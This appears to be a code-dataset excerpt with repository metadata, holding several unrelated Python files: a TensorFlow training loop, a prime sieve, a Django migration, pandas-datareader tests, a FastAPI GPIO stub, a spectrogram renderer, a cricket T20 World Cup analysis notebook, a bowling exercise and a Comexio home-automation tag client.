        read_data_batch(X, Y, MAG, num_training_samples, 'train')
    for i in range(num_iterations):
        n = n + 1
        # Pick the mini-batch rows: the whole cycle when the sizes match,
        # otherwise a random sample of indices (with replacement).
        if cycle_batch_size == num_batch_samples:
            ind = range(num_batch_samples)
        else:
            ind = np.random.randint(
                0, high=cycle_batch_size, size=num_batch_samples)
        xA = X[ind]
        yA = Y[ind]
        # once every 20 iterations evaluate things for the validation set.
        print_per = 20
        if n%print_per == 1:
            gc.collect()
            train_cost = sess.run(MeanSquareCost, feed_dict={x:xA, y_: yA})
            sum_rms = 0
            eval_cost = 0
            num_chunks = 20
            # Evaluate the test set in chunks of 50 samples.
            for it in range(num_chunks):
                eval_cost = eval_cost + sess.run(
                    MeanSquareCost, feed_dict={
                        x: X_test[ind_t[0+50*it:50+50*it]],
                        y_: Y_test[ind_t[0+50*it:50+50*it],:]})
                A = sess.run(
                    y_conv, feed_dict={
                        x: X_test[ind_t[0+50*it:50+50*it]]})
                B = sess.run(
                    y_conv_flipped, feed_dict={
                        x: X_test[ind_t[0+50*it:50+50*it]]})
                # Accumulate the per-parameter scatter (std over the chunk)
                # of the rotation-corrected predictions vs. ground truth.
                ROT_COR_PARS = get_rotation_corrected(
                    A,B,Y_test[ind_t[0+50*it:50+50*it],:])
                sum_rms = sum_rms + np.std(
                    ROT_COR_PARS-Y_test[ind_t[0+50*it:50+50*it], :], axis=0)
            eval_cost = eval_cost / num_chunks
            print("mod "+ str(model_num) + ", lr: " + str(learning_rate)
                  + ", " + np.array_str(sum_rms/num_chunks, precision=2))
            # show the iteration number, training cost, validation cost, and the
            # average time per iteration for training
            print("                                     "
                  + "%0.4d %0.4d %0.5f %0.5f %0.5f %0.3f"%(
                      i_sample, i, train_cost, eval_cost, min_eval_cost,
                      (time.time()-start_time)/print_per))
            start_time = time.time()
            # save file when validation cost drops
            if SAVE & (eval_cost<min_eval_cost) & (n>20):
                print "saving weights to the disk (eval) ..."
                save_path = saver.save(sess, save_file)
                print "done."
                min_eval_cost = np.minimum(min_eval_cost,eval_cost)
        sess.run(train_step, feed_dict={x: xA, y_: yA})
| 38.849462 | 80 | 0.562137 | 505 | 3,613 | 3.736634 | 0.261386 | 0.055114 | 0.025437 | 0.028617 | 0.293588 | 0.212507 | 0.144144 | 0.077901 | 0.077901 | 0.077901 | 0 | 0.043513 | 0.313036 | 3,613 | 92 | 81 | 39.271739 | 0.716761 | 0.060614 | 0 | 0.054054 | 0 | 0.013514 | 0.058261 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.094595 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7aaa78c4723caeac3fb5b1b2b9fe69e555ed2d5d | 654 | py | Python | instructors/course-2015/errors_and_introspection/project/primesieve1.py | mgadagin/PythonClass | 70b370362d75720b3fb0e1d6cc8158f9445e9708 | [
"MIT"
] | 46 | 2017-09-27T20:19:36.000Z | 2020-12-08T10:07:19.000Z | instructors/course-2015/errors_and_introspection/project/primesieve1.py | mgadagin/PythonClass | 70b370362d75720b3fb0e1d6cc8158f9445e9708 | [
"MIT"
] | 6 | 2018-01-09T08:07:37.000Z | 2020-09-07T12:25:13.000Z | instructors/course-2015/errors_and_introspection/project/primesieve1.py | mgadagin/PythonClass | 70b370362d75720b3fb0e1d6cc8158f9445e9708 | [
"MIT"
] | 18 | 2017-10-10T02:06:51.000Z | 2019-12-01T10:18:13.000Z | """
Sieve of Eratosthenes - Prime Sieve
Goal: Find the first n primes
What we know:
For a given integer, take every integer between 2 and itself (exclusive).
Test the given integer modulo each of these. If the result is zero, then it is nonprime.
If none of these modulos gives zero, then it is prime.
"""
# range will include the first argument and the 2nd argument minus 1.
range_to_test_for_primes = range(1,50)  # candidate numbers 1..49 to scan
def is_prime_helper(i):
    """ Spitballing prime helpers
    """
    # NOTE(review): i % (i-1) == 0 holds only for i == 2 (2 % 1 == 0), so
    # this flags 2 -- a prime -- as False and implicitly returns None for
    # everything else. Looks like an unfinished sketch; confirm the intent.
    if i % (i-1) == 0:
        return False
def is_prime(i):
    """Return True when i is prime, using trial division.

    Implements the approach in the module docstring: test i modulo every
    integer from 2 up to (but excluding) i; an exact division means i is
    composite. Values below 2 are not prime.

    Fix: the previous body was unfinished and contained a syntax error
    ('=!' is not a valid operator), so the module could not even be parsed.
    """
    if i < 2:
        return False  # 0, 1 and negatives are not prime
    for candidate_divisor in range(2, i):
        if i % candidate_divisor == 0:
            return False
    return True
| 17.210526 | 77 | 0.637615 | 106 | 654 | 3.811321 | 0.518868 | 0.05198 | 0.081683 | 0.059406 | 0.123762 | 0.123762 | 0 | 0 | 0 | 0 | 0 | 0.023256 | 0.276758 | 654 | 37 | 78 | 17.675676 | 0.830867 | 0.102446 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7aab6b0db7e62b035b739900d595c37d109328d7 | 824 | py | Python | events/migrations/0003_event_color.py | jjorissen52/golf_site2 | bcadd35f8386a20e532769cadf93eed6cea304fa | [
"MIT"
] | null | null | null | events/migrations/0003_event_color.py | jjorissen52/golf_site2 | bcadd35f8386a20e532769cadf93eed6cea304fa | [
"MIT"
] | 7 | 2019-10-21T21:55:23.000Z | 2021-06-08T19:43:12.000Z | events/migrations/0003_event_color.py | jjorissen52/golf-site | 4050f4518daf4c5b058f7fc38702a153021c2e1b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2017-11-04 03:34
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    dependencies = [
        ('events', '0002_auto_20171103_2212'),
    ]
    operations = [
        migrations.AddField(
            model_name='event',
            name='color',
            # 16 named hex colors to choose from; defaults to Blue (#0000FF).
            field=models.CharField(choices=[('#FFFFFF', 'White'), ('#C0C0C0', 'Silver'), ('#808080', 'Gray'), ('#000000', 'Black'), ('#FF0000', 'Red'), ('#800000', 'Maroon'), ('#FFFF00', 'Yellow'), ('#808000', 'Olive'), ('#00FF00', 'Lime'), ('#008000', 'Green'), ('#00FFFF', 'Aqua'), ('#008080', 'Teal'), ('#0000FF', 'Blue'), ('#000080', 'Navy'), ('#FF00FF', 'Fuchsia'), ('#800080', 'Purple')], default='#0000FF', max_length=7),
        ),
    ]
| 39.238095 | 428 | 0.565534 | 85 | 824 | 5.364706 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159463 | 0.18568 | 824 | 20 | 429 | 41.2 | 0.520119 | 0.082524 | 0 | 0 | 1 | 0 | 0.313413 | 0.030544 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7ab3d8c6fd521a3eb09a2a807ea3c5f59c26bd3d | 692 | py | Python | pavo_cristatus/tests/interactions_tests/test_non_annotated_project_loader_interaction.py | MATTHEWFRAZER/pavo_cristatus | a4b96c0eb6c454fbe38d2092e29f63457a4ee955 | [
"MIT"
] | null | null | null | pavo_cristatus/tests/interactions_tests/test_non_annotated_project_loader_interaction.py | MATTHEWFRAZER/pavo_cristatus | a4b96c0eb6c454fbe38d2092e29f63457a4ee955 | [
"MIT"
] | null | null | null | pavo_cristatus/tests/interactions_tests/test_non_annotated_project_loader_interaction.py | MATTHEWFRAZER/pavo_cristatus | a4b96c0eb6c454fbe38d2092e29f63457a4ee955 | [
"MIT"
] | null | null | null | import os
from pavo_cristatus.interactions.non_annotated_project_loader_interaction.non_annotated_project_loader_interaction import interact
from pavo_cristatus.interactions.pavo_cristatus_status import PavoCristatusStatus
# Directory containing this test module.
unit_test_path = os.path.split(__file__)[0]
# Path to the fake project fixture two levels up; backslashes are doubled
# so the path survives later string processing on Windows.
project_root_path = os.path.normpath(os.path.join(unit_test_path, "..", "..", "project_fake")).replace("\\", "\\\\")
# File names the loader is expected to discover in the fake project.
expected_files = {"__init__.py", "module_fake.py"}
def test_annotated_project_loader_interaction():
    """interact() succeeds and only reports modules from the fake project."""
    outcome = interact(project_root_path)
    assert outcome.status == PavoCristatusStatus.SUCCESS
    file_names = (symbols.python_file.file_name for symbols in outcome.result)
    assert all(name in expected_files for name in file_names)
| 46.133333 | 130 | 0.812139 | 90 | 692 | 5.8 | 0.444444 | 0.074713 | 0.126437 | 0.189655 | 0.137931 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001575 | 0.08237 | 692 | 14 | 131 | 49.428571 | 0.820472 | 0 | 0 | 0 | 0 | 0 | 0.067919 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.1 | false | 0 | 0.3 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7ab5d3886e481d9fd30cc1cfa29570356f13d910 | 945 | py | Python | book_env/Lib/site-packages/pandas_datareader/tests/test_base.py | als0052/Hands-On-Data-Analysis-with-Pandas | ea4e94f93a1e00cbccb493f22dde5c8007ed5e76 | [
"MIT"
] | 1 | 2018-01-11T14:11:40.000Z | 2018-01-11T14:11:40.000Z | book_env/Lib/site-packages/pandas_datareader/tests/test_base.py | als0052/Hands-On-Data-Analysis-with-Pandas | ea4e94f93a1e00cbccb493f22dde5c8007ed5e76 | [
"MIT"
] | 12 | 2020-06-06T01:22:26.000Z | 2022-03-12T00:13:42.000Z | book_env/Lib/site-packages/pandas_datareader/tests/test_base.py | als0052/Hands-On-Data-Analysis-with-Pandas | ea4e94f93a1e00cbccb493f22dde5c8007ed5e76 | [
"MIT"
] | 5 | 2018-05-19T05:08:51.000Z | 2021-04-29T16:03:45.000Z | import pytest
import requests
import pandas_datareader.base as base
class TestBaseReader(object):
    """Unit tests for the private _BaseReader plumbing."""

    def test_requests_not_monkey_patched(self):
        # A plain requests session must not carry a 'stor' attribute.
        session = requests.Session()
        assert not hasattr(session, 'stor')

    def test_valid_retry_count(self):
        # Both a non-integer and a negative retry count are rejected.
        for bad_count in ('stuff', -1):
            with pytest.raises(ValueError):
                base._BaseReader([], retry_count=bad_count)

    def test_invalid_url(self):
        reader = base._BaseReader([])
        with pytest.raises(NotImplementedError):
            reader.url

    def test_invalid_format(self):
        with pytest.raises(NotImplementedError):
            reader = base._BaseReader([])
            reader._format = 'IM_NOT_AN_IMPLEMENTED_TYPE'
            reader._read_one_data('a', None)
class TestDailyBaseReader(object):
    """Unit tests for the daily-reader abstract hooks."""

    def test_get_params(self):
        # Instantiating and calling _get_params on the abstract daily
        # reader must raise NotImplementedError somewhere in this block.
        with pytest.raises(NotImplementedError):
            reader = base._DailyBaseReader()
            reader._get_params()
| 28.636364 | 54 | 0.660317 | 105 | 945 | 5.647619 | 0.447619 | 0.059022 | 0.134907 | 0.134907 | 0.382799 | 0.317032 | 0.317032 | 0.168634 | 0 | 0 | 0 | 0.001389 | 0.238095 | 945 | 32 | 55 | 29.53125 | 0.822222 | 0 | 0 | 0.208333 | 0 | 0 | 0.038095 | 0.027513 | 0 | 0 | 0 | 0 | 0.041667 | 1 | 0.208333 | false | 0 | 0.125 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7ab71be8f87ed1d659c3f47a1fed46f77be7dcc7 | 1,387 | py | Python | run.py | ITJoker233/RaspberryPiWebSDK | ae24ec9a84ed34efcccca59055bdf097a42c3409 | [
"MIT"
] | 4 | 2020-11-15T05:38:02.000Z | 2022-03-07T12:19:37.000Z | run.py | ITJoker233/RaspberryPiWebSDK | ae24ec9a84ed34efcccca59055bdf097a42c3409 | [
"MIT"
] | null | null | null | run.py | ITJoker233/RaspberryPiWebSDK | ae24ec9a84ed34efcccca59055bdf097a42c3409 | [
"MIT"
] | null | null | null | import uvicorn
from datetime import datetime
from typing import List, Optional
from fastapi import FastAPI
from fastapi.encoders import jsonable_encoder
from fastapi.responses import JSONResponse
from pydantic import BaseModel, EmailStr
app = FastAPI()
_version_ = '1.0.0'
class baseRequest(BaseModel):
    """Request body for GPIO control calls."""
    num: Optional[int] = None  # optional pin/IO number
    ioType:str  # kind of IO point — valid values not shown in this file
    key:str  # identifier of the target IO point
    status: bool  # desired on/off state
class baseResponse(BaseModel):
    """Standard response envelope declared for every endpoint."""
    detail:str  # extra detail text (empty in the canned responses)
    data:str  # payload string
    message:str  # human-readable status message
    status: int  # 1 in the 'Success' canned responses, 0 in the template
    timestamp: datetime  # NOTE(review): the canned responses never set this
# Canned response payloads keyed by endpoint. 'root' and 'version' are
# complete; 'status' is a template whose data/message/status fields are
# (apparently) meant to be filled in per request.
response = {
    'root':{'data':f'Raspberry Pi Web SDK {_version_} Look at /docs','detail':'','message':'Success','status':1},
    'version':{'data':f'Raspberry Pi Web SDK {_version_}','detail':'','message':'Success','status':1},
    'status':{'data':'','detail':'','message':'','status':0},
}
@app.get("/",response_model=baseResponse)
async def root():
    # Landing endpoint: returns the canned banner pointing callers at /docs.
    return JSONResponse(response['root'])
@app.get("/version",response_model=baseResponse)
async def version():
    # Return the SDK version string (prebuilt in the `response` table).
    return JSONResponse(response['version'])
@app.get('/status/{gpio_id}',response_model=baseResponse)
async def read_item(gpio_id: int):
    """Report the status of a single GPIO pin.

    NOTE(review): the original body contained three bare expression
    statements (``response_['data']`` etc.) that read dict entries and
    discarded the result — presumably placeholders for a GPIO lookup that
    was never implemented. They had no effect, so they were removed; the
    endpoint still returns the empty 'status' template unchanged, and
    ``gpio_id`` is still unused pending a real implementation.
    """
    response_ = response['status']
    return JSONResponse(response_)
#if __name__ == "__main__":
# uvicorn.run(app, host="0.0.0.0", port=80,debug=True) | 27.196078 | 114 | 0.669791 | 166 | 1,387 | 5.439759 | 0.385542 | 0.008859 | 0.083056 | 0.099668 | 0.233666 | 0.06423 | 0.06423 | 0 | 0 | 0 | 0 | 0.010526 | 0.178082 | 1,387 | 51 | 115 | 27.196078 | 0.781579 | 0.05912 | 0 | 0 | 0 | 0 | 0.19378 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.184211 | 0 | 0.552632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
7ab8a9c5276a11c96afe25603d9046739df569e8 | 605 | py | Python | python/show_spec.py | nox-410/MusicAndMathClassProject | 457e800b05dcf1595f97e359f75d14bf1fcc35d4 | [
"Apache-2.0"
] | null | null | null | python/show_spec.py | nox-410/MusicAndMathClassProject | 457e800b05dcf1595f97e359f75d14bf1fcc35d4 | [
"Apache-2.0"
] | null | null | null | python/show_spec.py | nox-410/MusicAndMathClassProject | 457e800b05dcf1595f97e359f75d14bf1fcc35d4 | [
"Apache-2.0"
] | null | null | null | import sys
import numpy as np
from PIL import Image
def spec_to_png(in_path, out_path):
    """Render a saved spectrogram (.npy) as a 128px-wide grayscale PNG.

    Parameters
    ----------
    in_path : str
        Path to a .npy file laid out as (channels, bins, frames); only
        the first channel is used.
    out_path : str
        Destination PNG path.
    """
    specgram = np.load(in_path)  # (channels, bins, frames)
    specgram = specgram[0]
    specgram = np.log2(specgram)
    # Collapse the frame axis to one column, then tile it 128px wide.
    specgram = specgram.sum(1)[:, np.newaxis]
    specgram = np.repeat(specgram, 128, axis=1)
    # Normalize to [0, 1]; guard against a flat spectrogram (0/0 -> NaN).
    smax, smin = np.max(specgram), np.min(specgram)
    span = smax - smin
    if span == 0:
        specgram = np.zeros_like(specgram)
    else:
        specgram = (specgram - smin) / span
    # BUGFIX: the original scaled by 256, so the maximum value (1.0)
    # became 256 and wrapped to 0 under uint8 — the brightest pixel
    # rendered black. Scale by 255 instead.
    specgram = (specgram * 255).astype(np.uint8)
    specgram = np.flipud(specgram)  # low bins at the bottom of the image
    Image.fromarray(specgram).save(out_path)

if __name__ == '__main__':
    spec_to_png(sys.argv[1], sys.argv[2])
| 28.809524 | 59 | 0.672727 | 87 | 605 | 4.494253 | 0.494253 | 0.245524 | 0.046036 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026423 | 0.186777 | 605 | 20 | 60 | 30.25 | 0.768293 | 0.039669 | 0 | 0 | 0 | 0 | 0.013817 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.1875 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7abe28c365aac27b7165b4ab17f3803fad4552ae | 7,075 | py | Python | EDA_T-20WorldCup.py | Saurabh2509/T-20_World_Cup_EDA | 39c236b97f48155a535b0b0c7730eb70d020c261 | [
"MIT"
] | null | null | null | EDA_T-20WorldCup.py | Saurabh2509/T-20_World_Cup_EDA | 39c236b97f48155a535b0b0c7730eb70d020c261 | [
"MIT"
] | null | null | null | EDA_T-20WorldCup.py | Saurabh2509/T-20_World_Cup_EDA | 39c236b97f48155a535b0b0c7730eb70d020c261 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# ## Exploratory_Data_Analysis
# In[4]:
# NOTE(review): the two statements below are notebook-export artifacts and
# crash when this file runs as a plain script — `Image` is only imported
# further down the file, and `pwd` is an IPython magic, so both raise
# NameError here. Disabled; re-enable inside a notebook session if needed.
# Image("E:\DataScience\Data_Center\T_20_World_cup_data\ICC_Men's_T20_World_Cup_2021.png")
# In[1]:
# pwd
# In[2]:
import os
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style('darkgrid')
import plotly.express as px
import pandas as pd
import numpy as np
from scipy import signal
#to supress warning
import warnings
warnings.filterwarnings('ignore')
#to make shell more intractive
from IPython.display import display
from IPython.display import Image
# setting up the chart size and background
plt.rcParams['figure.figsize'] = (16, 8)
plt.style.use('fivethirtyeight')
# In[3]:
path ="E:\DataScience\Data_Center\T_20_World_cup_data"
dir_list = os.listdir(path)
print(dir_list)
# In[5]:
df =pd.read_csv("E:\DataScience\Data_Center\T_20_World_cup_data\kaggle_data.csv")
# In[6]:
df.head()
# In[7]:
df.tail()
# In[8]:
df.columns
# In[9]:
df.describe()
# In[10]:
df.info()
# In[11]:
df.isnull().sum()
# In[12]:
df.nunique(axis=0)
# In[13]:
A=df['team_1'].unique()
print(A)
# In[14]:
B =df['stage'].unique()
print(B)
# In[15]:
C=df['Winner_toss'].unique()
print(C)
# In[16]:
D=df['Toss_descision'].unique()
print(D)
# In[17]:
E=df['time'].unique()
print(E)
# In[18]:
F =df['venue'].unique()
print(F)
# In[19]:
G=df['avg_temperature'].unique()
print(G)
# In[20]:
I =df['best_bowler'].unique()
print(I)
# In[21]:
H =df['bowling_arm'].unique()
print(H)
# In[22]:
J =df['bowling_style'].unique()
print(J)
# In[23]:
K =df['most_individual_wickets'].unique()
print(K)
# In[24]:
H =df['best_batter_team'].unique()
print(H)
# In[25]:
I =df['Player_of_the_match'].unique()
print(I)
# In[26]:
#remnaming
df = df.rename(columns = {'Unnamed: 0' : 'Match Number'})
df.head()
# In[27]:
#index match
df = df.set_index('Match Number')
df.head()
# In[28]:
Time =df['time'].value_counts()
# In[29]:
Time
# In[30]:
type(Time)
# In[31]:
toss_list =df['Winner_toss'].tolist()
win_list=df['Winner'].tolist()
winner=0
looser=0
for i in range(len(toss_list)):
if(toss_list[i] == win_list[i]):
winner +=1
else:
looser +=1
print("Won Toss and Won Match:",winner)
print("Won Toss and Loose Match:",looser)
# In[32]:
#match won by each team
plt.figure(figsize = (8,6))
sns.countplot(df['time'], palette = 'Set1')
plt.title("Time Slot :Match")
plt.show()
# In[33]:
# Temprature range:
fig =px.pie(Time ,values =df['avg_temperature'].value_counts(),names=['30-Temp','33-Temp','34-Temp','29-Temp',
'28-Temp','31-Temp','20-Temp','27-temp','26-Temp'],
title=' Temparature Range Records while Match:')
fig.update_traces(textposition='inside', textinfo='percent+label')
fig.show()
#temp in *c
# In[34]:
#match won by each team
sns.countplot(y='Winner',data=df)
# In[35]:
#count of venue
plt.figure(figsize = (8,6))
sns.countplot(df['venue'], palette = 'Set1')
plt.title("Venue for Tournament")
plt.show()
# In[36]:
#Man of MATCH
print("Player : No_of_times_player_of_match")
df['Player_of_the_match'].value_counts().nlargest(5)
# In[37]:
# correlation
plt.figure(figsize = (8,6))
sns.heatmap(df.corr(), annot = True, cmap = 'OrRd')
plt.title("Correlation")
plt.show()
# In[38]:
#colum name-update
df.target_achieved[df['target_achieved'] == 0] = 'Achieved'
df.target_achieved[df['target_achieved'] == 1] = 'Not Achieved'
df.head()
# In[39]:
plt.figure(figsize = (8,6))
sns.countplot(df['stage'], palette = 'Set1')
plt.title("Stage of Tournament")
plt.show()
# In[40]:
plt.figure(figsize = (8,6))
sns.countplot(y=df['best_batter_team'], palette = 'Set1')
plt.title("Best Batting Team")
plt.show()
# In[41]:
plt.figure(figsize = (8,6))
sns.countplot(y=df['best_bowler_country'], palette = 'Set1')
plt.title("Best Bolwing Team")
plt.show()
# In[42]:
print("Top 5 Batsman in T20-World-Cup-2021:")
df['best_batter'].value_counts().nlargest(5)
# In[43]:
print("Top 5 Bolwer in T20-World-Cup-2021:")
df['best_bowler'].value_counts().nlargest(5)
# In[44]:
print("Top 10 highest Score:")
df['target'].sort_values(ascending=False).nlargest(10)
# In[45]:
print("Least 10 Score:")
df['target'].sort_values(ascending=False).nsmallest(10)
# In[46]:
print("Top 10 high_indvidual_scores:")
df['high_indvidual_scores'].sort_values(ascending=False).nlargest(10)
# In[60]:
#by each team
plt.figure(figsize = (8,6))
sns.countplot(df['Toss_descision'], palette = 'Set1')
plt.title("Toss descision")
plt.show()
# In[ ]:
# In[47]:
#team 1 & target achievement
achieved_target_team1 = df.groupby(['team_1', 'target_achieved']).size().reset_index(name = 'Count')
# In[48]:
#visualize team 1
plt.figure(figsize = (10,6))
chart = sns.barplot(data =achieved_target_team1 , x = 'team_1', y ='Count', hue = 'target_achieved', palette = 'Set1')
chart.set_xticklabels(chart.get_xticklabels(), rotation = 35)
plt.title("Team 1 - Achievement")
plt.show()
# In[49]:
#team 2 & target achievement
achieved_target_team2 = df.groupby(['team_2', 'target_achieved']).size().reset_index(name = 'Count')
# In[50]:
#visualize team 2
plt.figure(figsize = (10,6))
chart = sns.barplot(data =achieved_target_team2 , x = 'team_2', y ='Count', hue = 'target_achieved', palette = 'Set1')
chart.set_xticklabels(chart.get_xticklabels(), rotation = 35)
plt.title("Team 2 - Achievement")
plt.show()
# In[51]:
Team =df.groupby(['team_1','team_2','Winner_toss','time','Toss_descision','venue','Player_of_the_match']).size()
# In[52]:
Team=Team.to_frame()
# In[53]:
Team
# In[54]:
type(Team)
# In[55]:
fig = px.sunburst(df, names=None, values=None, parents=None, path=['team_1','team_2','Toss_descision','Winner','venue'],
color='team_2', color_continuous_scale=None, range_color=None, color_continuous_midpoint=None,
color_discrete_sequence=None, color_discrete_map={},
hover_data=['team_1','team_2','Toss_descision','Winner','venue'],
labels={}, title= "Team VS Team - Winner")
fig.show()
# In[56]:
Stage=df.groupby(['stage','team_1','team_2','Winner_toss','time','Toss_descision','venue']).size()
# In[57]:
Stage=Stage.to_frame()
# In[58]:
Stage
# In[59]:
fig = px.sunburst(df, names=None, values=None, parents=None, path=['stage','team_1','team_2','Winner_toss','time','Toss_descision','venue'],
color='team_1', color_continuous_scale=None, range_color=None, color_continuous_midpoint=None,
color_discrete_sequence=None, color_discrete_map={},
hover_data=['stage','team_1','team_2','time','Toss_descision','venue'] ,
labels={'Stage','Team-A','Team-B','Time','Toss_descision','Venue'}, title= "Detailed_Analysis Chart")
fig.show()
# In[62]:
#
sns.pairplot(df,hue='team_1')
# In[ ]:
# NOTE(review): the two lines below were bare prose (a separator and a
# copyright note) that made this file a SyntaxError when executed; they
# are preserved as comments instead.
# -----------------XXX-----------------
# @copyright : Saurabh 29-nov
| 14.15 | 141 | 0.642686 | 1,065 | 7,075 | 4.124883 | 0.271362 | 0.015934 | 0.032779 | 0.027089 | 0.390394 | 0.338721 | 0.319372 | 0.281129 | 0.233326 | 0.208058 | 0 | 0.041716 | 0.159717 | 7,075 | 499 | 142 | 14.178357 | 0.697225 | 0.125371 | 0 | 0.214286 | 0 | 0 | 0.272951 | 0.045902 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.064935 | null | null | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8f8bac00504c5bb434251bf0a0ab45ac3d403096 | 217 | py | Python | Desafios/AULA/2.1 Boliche com Tio Rubs.py | evertonROY/Python | b64f98e52700a4f1f4212400b69c9d6d080c8f88 | [
"MIT"
] | null | null | null | Desafios/AULA/2.1 Boliche com Tio Rubs.py | evertonROY/Python | b64f98e52700a4f1f4212400b69c9d6d080c8f88 | [
"MIT"
] | null | null | null | Desafios/AULA/2.1 Boliche com Tio Rubs.py | evertonROY/Python | b64f98e52700a4f1f4212400b69c9d6d080c8f88 | [
"MIT"
] | null | null | null | '''
a = qtd pistas 1
b = qtd pessoas por pistas 9
c = qtd alunos 4
'''
# Read lane count, capacity per lane, and number of students from stdin.
lanes, per_lane, students = (int(token) for token in input().split())
# Everyone fits only if total capacity strictly exceeds the student count.
if lanes * per_lane > students:
    print("S")
else:
    print("N")
| 16.692308 | 43 | 0.400922 | 33 | 217 | 2.636364 | 0.666667 | 0.045977 | 0.068966 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02459 | 0.437788 | 217 | 12 | 44 | 18.083333 | 0.688525 | 0.493088 | 0 | 0 | 0 | 0 | 0.019608 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8f8efc2310eeea2e384d88b51c3b58442b2b2f34 | 809 | py | Python | src/comexio_http/tag.py | sanderd17/comexio-http-api | 08580f118365e50b9473bb3437158baff1e07c8b | [
"MIT"
] | null | null | null | src/comexio_http/tag.py | sanderd17/comexio-http-api | 08580f118365e50b9473bb3437158baff1e07c8b | [
"MIT"
] | null | null | null | src/comexio_http/tag.py | sanderd17/comexio-http-api | 08580f118365e50b9473bb3437158baff1e07c8b | [
"MIT"
] | null | null | null | from .auth import Auth
class Tag:
    """
    Abstract Comexio tag.

    ``address`` is a dictionary identifying the data point, in one of
    these formats::

        {"ext": "IO-Server", "io": "Q1"}
        {"marker": "M1"}
        {"onewire": "OT1"}
    """

    def __init__(self, address: dict, auth: Auth):
        self.address = address
        self.auth = auth

    @property
    def value(self):
        # Strip trailing NUL padding before parsing the numeric payload.
        # TODO: let user choose between float, int or bool
        stripped = self.raw_data.strip("\x00")
        return float(stripped)

    async def async_set(self, value):
        """Set the IO value"""
        payload = self.address | {"action": "set", "value": value}
        await self.auth.request(payload)
        await self.async_get()

    async def async_get(self):
        """Refresh the IO data."""
        payload = self.address | {"action": "get"}
        self.raw_data = await self.auth.request(payload)
